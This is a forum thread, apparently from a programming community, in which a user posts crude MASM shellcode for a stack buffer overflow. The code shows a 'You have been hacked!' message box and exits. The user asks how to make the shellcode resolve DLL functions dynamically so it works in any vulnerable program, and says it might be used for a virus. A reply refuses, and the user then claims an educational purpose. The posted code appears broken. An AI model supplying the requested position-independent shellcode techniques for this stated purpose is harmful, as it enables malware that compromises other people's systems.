Hi all,
I'm programming a shell code for stack buffer overflow vulnerabilities, I have learned about it and read alot of this vulnerability and finally I have the ability to exploit it and make the shells.
This is my code:

;+-+-+-+-+[ FileName: shellcode.asm ]+-+-+-+-+-+
.model flat, stdcall
option casemap:none

;+-+-+-+-+ Include Files +-+-+-+-+-+
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc

;+-+-+-+-+ Include Libraries +-+-+-+-+
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib


;|=--------------=[ shell code section ]=---------------=|
    push 0 ; OK button
    jmp _caption
    jmp _msg
    push 0 ; hWnd
    call DWORD PTR DS:[402034h] ; <=> call MessageBox

    push 0
    call DWORD PTR DS:[402014h] ; <=> call ExitProcess

;|=--------------=[ shell data section ]=---------------=|
    call _rCaption ; <=> push offset caption
    caption db "ha ha",0
    call _rMsg ; <=> push offset msg
    msg db "You have been hacked!",0

end main

Now as you can see the routines above (messagebox, and exitprocess) are static, so I must know the address of the procedures inside the target program and put it into the shell and assemble it again!! :(

Is there any way to make the shell dynamically, my point is how to <b>include the dll procedures inside the body of programs?</b>

The reason of my question is to make the shell works in any program that have the stack buffer overflow vulnerability and maybe to make virus do the same way.

Note: I don't accept the solution that make the shell takes the addresses from import data section of the target program, this is can work for the example above but don't work with shells that have different dll procedures.

Recommended Answers

All 3 Replies

If this is for security research purposes then I applaud your efforts to understand stack vulnerabilities. In any case, we cannot help you with this since it can be used to write exploits/viruses that can compromise systems. You are on your own!

This is just for education purpose only, I'm using it for research becuase of my Professor request from me that.

Is there any one to help me?
I sware to god I don't attend to make viruses to harm people. Is just for education only.

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, learning, and sharing knowledge.